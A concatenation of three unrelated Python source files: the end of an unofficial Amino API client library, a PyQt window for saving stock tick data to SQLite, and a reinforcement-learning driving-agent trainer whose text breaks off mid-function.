response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["linkedCommunityList"]).CommunityList
def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["unlinkedCommunityList"]).CommunityList
def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-comment", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def delete_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Delete a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-comment/{commentId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_blog(self, blogId: [str, list] = None, wikiId: str = None):
"""
Like a Blog, Multiple Blogs or a Wiki.
**Parameters**
- **blogId** : ID of the Blog or List of IDs of the Blogs. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if blogId:
if isinstance(blogId, str):
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif isinstance(blogId, list):
data["targetIdList"] = blogId
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/feed/g-vote", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.WrongType(type(blogId))
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/g-vote?cv=1.2", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unlike_blog(self, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Blog or Wiki.
**Parameters**
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def like_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Like a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"value": 4,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
elif wikiId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?cv=1.2&value=1", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def unlike_comment(self, commentId: str, userId: str = None, blogId: str = None, wikiId: str = None):
"""
Remove a like from a Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **commentId** : ID of the Comment.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if userId: response = requests.delete(f"{self.api}/g/s/user-profile/{userId}/comment/{commentId}/g-vote?eventSource=UserProfileView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif blogId: response = requests.delete(f"{self.api}/g/s/blog/{blogId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.delete(f"{self.api}/g/s/item/{wikiId}/comment/{commentId}/g-vote?eventSource=PostDetailView", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_membership_info(self):
"""
Get Information about your Amino+ Membership.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Membership Object <amino.lib.src.objects.Membership>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/membership?force=true", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Membership(json.loads(response.text)).Membership
def get_ta_announcements(self, language: str = "en", start: int = 0, size: int = 25):
"""
Get the list of Team Amino's Announcement Blogs.
**Parameters**
- **language** : Language of the Blogs.
- ``en``, ``es``, ``pt``, ``ar``, ``ru``, ``fr``, ``de``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Blogs List <amino.lib.src.objects.BlogList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if language not in self.get_supported_languages(): raise exceptions.UnsupportedLanguage(language)
response = requests.get(f"{self.api}/g/s/announcement?language={language}&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.BlogList(json.loads(response.text)["blogList"]).BlogList
def get_wallet_info(self):
"""
Get Information about the account's Wallet.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.src.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletInfo(json.loads(response.text)["wallet"]).WalletInfo
def get_wallet_history(self, start: int = 0, size: int = 25):
"""
Get the Wallet's History Information.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Wallet Object <amino.lib.src.objects.WalletInfo>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/wallet/coin/history?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.WalletHistory(json.loads(response.text)["coinHistoryList"]).WalletHistory
def get_from_deviceid(self, deviceId: str):
"""
Get the User ID from an Device ID.
**Parameters**
- **deviceID** : ID of the Device.
**Returns**
- **Success** : :meth:`User ID <amino.lib.src.objects.UserProfile.userId>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/auid?deviceId={deviceId}")
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["auid"]
def get_from_code(self, code: str):
"""
Get the Object Information from the Amino URL Code.
**Parameters**
- **code** : Code from the Amino URL.
- ``http://aminoapps.com/p/EXAMPLE``, the ``code`` is 'EXAMPLE'.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.src.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/link-resolution?q={code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_from_id(self, objectId: str, objectType: int, comId: str = None):
"""
Get the Object Information from the Object ID and Type.
**Parameters**
- **objectID** : ID of the Object. User ID, Blog ID, etc.
- **objectType** : Type of the Object.
- *comId* : ID of the Community. Use if the Object is in a Community.
**Returns**
- **Success** : :meth:`From Code Object <amino.lib.src.objects.FromCode>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"objectId": objectId,
"targetCode": 1,
"objectType": objectType,
"timestamp": int(timestamp() * 1000)
})
if comId: response = requests.post(f"{self.api}/g/s-x{comId}/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/link-resolution", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.FromCode(json.loads(response.text)["linkInfoV2"]).FromCode
def get_supported_languages(self):
"""
Get the List of Supported Languages by Amino.
**Parameters**
- No parameters required.
**Returns**
- **Success** : :meth:`List of Supported Languages <List>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/community-collection/supported-languages?start=0&size=100", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["supportedLanguages"]
def claim_new_user_coupon(self):
"""
Claim the New User Coupon available when a new account is created.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/coupon/new-user-coupon/claim", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_subscriptions(self, start: int = 0, size: int = 25):
"""
Get Information about the account's Subscriptions.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List <List>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/store/subscription?objectType=122&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["storeSubscriptionItemList"]
def get_all_users(self, start: int = 0, size: int = 25):
"""
Get list of users of Amino.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User Profile Count List Object <amino.lib.src.objects.UserProfileCountList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile?type=recent&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileCountList(json.loads(response.text)).UserProfileCountList
def accept_host(self, chatId: str, requestId: str):
data = json.dumps({})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/transfer-organizer/{requestId}/accept", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def accept_organizer(self, chatId: str, requestId: str):
self.accept_host(chatId, requestId)
# Contributed by 'https://github.com/LynxN1'
def link_identify(self, code: str):
response = requests.get(f"{self.api}/g/s/community/link-identify?q=http%3A%2F%2Faminoapps.com%2Finvite%2F{code}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
return json.loads(response.text)
def invite_to_vc(self, chatId: str, userId: str):
"""
Invite a User to a Voice Chat
**Parameters**
- **chatId** - ID of the Chat
- **userId** - ID of the User
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"uid": userId
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/vvchat-presenter/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def wallet_config(self, level: int):
"""
Changes ads config
**Parameters**
- **level** - Level of the ads.
- ``1``, ``2``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"adsLevel": level,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/wallet/ads/config", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_avatar_frames(self, start: int = 0, size: int = 25):
response = requests.get(f"{self.api}/g/s/avatar-frame?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.AvatarFrameList(json.loads(response.text)["avatarFrameList"]).AvatarFrameList
|
window.py | import os
import sys
import sqlite3
import logging
from PyQt5 import QtCore
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QPalette
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import *
from utility.static import now, strf_time
class Window(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.log = logging.getLogger('Window')
self.log.setLevel(logging.INFO)
filehandler = logging.FileHandler(filename=f"{system_path}/Log/T{strf_time('%Y%m%d')}.txt", encoding='utf-8')
self.log.addHandler(filehandler)
def setTextEdit(tab):
textedit = QtWidgets.QTextEdit(tab)
textedit.setReadOnly(True)
textedit.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
textedit.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
textedit.setStyleSheet(style_bc_dk)
textedit.setFont(qfont1)
return textedit
self.setFont(qfont1)
self.setWindowFlags(Qt.FramelessWindowHint)
self.setGeometry(0, 0, 692, 292)
self.lg_tabWidget = QtWidgets.QTabWidget(self)
self.lg_tabWidget.setGeometry(5, 5, 682, 282)
self.lg_tab = QtWidgets.QWidget()
self.lg_textEdit = setTextEdit(self.lg_tab)
self.lg_textEdit.setGeometry(5, 5, 668, 242)
self.lg_tabWidget.addTab(self.lg_tab, '틱데이터 저장')
self.info_label = QtWidgets.QLabel(self)
self.info_label.setGeometry(105, 1, 500, 30)
self.writer = Writer()
self.writer.data0.connect(self.UpdateTexedit)
self.writer.start()
def UpdateTexedit(self, msg):
if '부가정보' in msg:
self.UpdateInfo(msg.split(' ')[1], msg.split(' ')[2])
else:
self.lg_textEdit.setTextColor(color_fg_dk)
self.lg_textEdit.append(f'[{now()}] {msg}')
self.log.info(f'[{now()}] {msg}')
if msg == '시스템 명령 실행 알림 - 시스템 종료':
sys.exit()
def UpdateInfo(self, jcps, hjps):
tickqsize = tick1Q.qsize() + tick2Q.qsize() + tick3Q.qsize() + tick4Q.qsize()
tickqsize += tick5Q.qsize() + tick6Q.qsize() + tick7Q.qsize() + tick8Q.qsize()
label01text = f'Data Received - RTJC {jcps}TICKps | RTHJ {hjps}TICKps, Queue size - tickQ {tickqsize}'
self.info_label.setText(label01text)
class Writer(QtCore.QThread):
data0 = QtCore.pyqtSignal(str)
def __init__(self):
super().__init__()
def run(self):
while True:
data = windowQ.get()
self.data0.emit(data)
class Query:
def __init__(self, windowQQ, workerQQ, queryQQ):
self.windowQ = windowQQ
self.workerQ = workerQQ
self.queryQ = queryQQ
self.Start()
def Start(self):
k = 1
while True:
query = self.queryQ.get()
if len(query) > 0:
j = 1
con = sqlite3.connect(db_tick)
for code in list(query.keys()):
query[code].to_sql(code, con, if_exists='append', chunksize=1000)
self.windowQ.put(f'시스템 명령 실행 알림 - 틱데이터 저장 중...Proc[{k}/8] Dict[{j}/{len(query)}]')
j += 1
con.close()
k += 1
if k == 9:
break
self.workerQ.put('틱데이터 저장 완료')
if __name__ == '__main__':
windowQ, workerQ, queryQ, tick1Q, tick2Q, tick3Q, tick4Q, tick5Q, tick6Q, tick7Q, tick8Q = \
Queue(), Queue(), Queue(), Queue(), Queue(), Queue(), Queue(), Queue(), Queue(), Queue(), Queue()
from worker import Worker
from updater_tick import UpdaterTick
Process(target=Query, args=(windowQ, workerQ, queryQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick1Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick2Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick3Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick4Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick5Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick6Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick7Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=UpdaterTick, args=(tick8Q, queryQ, workerQ, windowQ), daemon=True).start()
Process(target=Worker, args=(windowQ, workerQ,
tick1Q, tick2Q, tick3Q, tick4Q, tick5Q, tick6Q, tick7Q, tick8Q), daemon=True).start()
app = QtWidgets.QApplication(sys.argv)
app.setStyle('fusion')
palette = QPalette()
palette.setColor(QPalette.Window, color_bg_bc)
palette.setColor(QPalette.Background, color_bg_bc)
palette.setColor(QPalette.WindowText, color_fg_bc)
palette.setColor(QPalette.Base, color_bg_bc)
palette.setColor(QPalette.AlternateBase, color_bg_dk)
palette.setColor(QPalette.Text, color_fg_bc)
palette.setColor(QPalette.Button, color_bg_bc)
palette.setColor(QPalette.ButtonText, color_fg_bc)
palette.setColor(QPalette.Link, color_fg_bk)
palette.setColor(QPalette.Highlight, color_fg_bk)
palette.setColor(QPalette.HighlightedText, color_bg_bk)
app.setPalette(palette)
window = Window()
window.show()
app.exec_()
|
trainer.py | import os
import sys
import settings
from sources import ARTDQNAgent, TensorBoard, STOP, ACTIONS, ACTIONS_NAMES
from collections import deque
import time
import random
import numpy as np
import pickle
import json
from dataclasses import dataclass
from threading import Thread
# Try to mute and then load Tensorflow
# Muting seems to not work lately on Linux in any way
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
stdin = sys.stdin
sys.stdin = open(os.devnull, 'w')
stderr = sys.stderr
sys.stderr = open(os.devnull, 'w')
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import keras.backend.tensorflow_backend as backend
sys.stdin = stdin
sys.stderr = stderr
# Trainer class
class ARTDQNTrainer(ARTDQNAgent):
def __init__(self, model_path):
# If model path is being passed in - use it instead of creating a new one
self.model_path = model_path
self.model = self.create_model()
# We are going to train a model in a loop using separate thread
# Tensorflow needs to know about the graph to use as we load or create model in main thread
# Save model graph as object property for later use
self.graph = tf.get_default_graph()
# Init is being split into two parts. Firs one is being loaded always, but this one only for training
# (when calculating weights we don't need that)
def init2(self, stop, logdir, trainer_stats, episode, epsilon, discount, update_target_every, last_target_update, min_reward, agent_show_preview, save_checkpoint_every, seconds_per_episode, duration, optimizer, models, car_npcs):
# Trainer does not use convcam
self.show_conv_cam = False
# Target network
self.target_model = self.create_model(prediction=True)
self.target_model.set_weights(self.model.get_weights())
# An array with last n transitions for training
self.replay_memory = deque(maxlen=settings.REPLAY_MEMORY_SIZE)
# Set log dir for tensorboard - either create one or use (if passed in) existing one
# Create tensorboard object and set current step (being an episode for the agent)
self.logdir = logdir if logdir else "logs/{}-{}".format(settings.MODEL_NAME, int(time.time()))
self.tensorboard = TensorBoard(log_dir=self.logdir)
self.tensorboard.step = episode.value
# Used to count when to update target network with main network's weights
self.last_target_update = last_target_update
# Internal properties
self.last_log_episode = 0
self.tps = 0
self.last_checkpoint = 0
self.save_model = False
# Shared properties - either used by model or only for checkpoint purposes
self.stop = stop
self.trainer_stats = trainer_stats
self.episode = episode
self.epsilon = epsilon
self.discount = discount
self.update_target_every = update_target_every
self.min_reward = min_reward
self.agent_show_preview = agent_show_preview
self.save_checkpoint_every = save_checkpoint_every
self.seconds_per_episode = seconds_per_episode
self.duration = duration
self.optimizer = optimizer
self.models = models
self.car_npcs = car_npcs
# Update optimizer stats with lr and decay
self.optimizer[0], self.optimizer[1] = self.get_lr_decay()
# Adds transition (step's data) to a memory replay list
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self):
# Start training only if certain number of transitions is already being saved in replay memory
if len(self.replay_memory) < settings.MIN_REPLAY_MEMORY_SIZE:
return False
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, settings.MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = [np.array([transition[0][0] for transition in minibatch])/255]
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][1]] for transition in minibatch]) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][2]] for transition in minibatch]) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
current_states.append((np.array([[transition[0][3]] for transition in minibatch]) - 150) / 150)
# We need to use previously saved graph here as this is going to be called from separate thread
with self.graph.as_default():
current_qs_list = self.model.predict(current_states, settings.PREDICTION_BATCH_SIZE)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = [np.array([transition[3][0] for transition in minibatch])/255]
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][1]] for transition in minibatch]) - 50) / 50)
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][2]] for transition in minibatch]) - 8) / 8)
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
new_current_states.append((np.array([[transition[3][3]] for transition in minibatch]) - 150) / 150)
with self.graph.as_default():
future_qs_list = self.target_model.predict(new_current_states, settings.PREDICTION_BATCH_SIZE)
X = []
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
X_kmh = []
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
X_d2wp = []
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
X_d2goal = []
y = []
# Enumerate samples in minibatch
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If it's not a terminal state, get new Q value from future states, otherwise set it to a reward
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + self.discount.value * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state[0])
if 'kmh' in settings.AGENT_ADDITIONAL_DATA:
X_kmh.append([current_state[1]])
if 'd2wp' in settings.AGENT_ADDITIONAL_DATA:
X_d2wp.append([current_state[2]])
if 'd2goal' in settings.AGENT_ADDITIONAL_DATA:
X_d2goal.append([current_state[3]])
y.append(current_qs)
# Log only on terminal state. As trainer trains in an asynchronous way, it does not know when
# and which agent just finished an episode. Instead of that we monitor episode number and once
# it changes, we log current .fit() call. We do that as we do want to save stats once per every episode
log_this_step = False
if self.tensorboard.step > self.last_log_episode:
log_this_step = True
self.last_log_episode = self.tensorboard.step
# Prepare inputs
Xs = [np.array(X)/255]
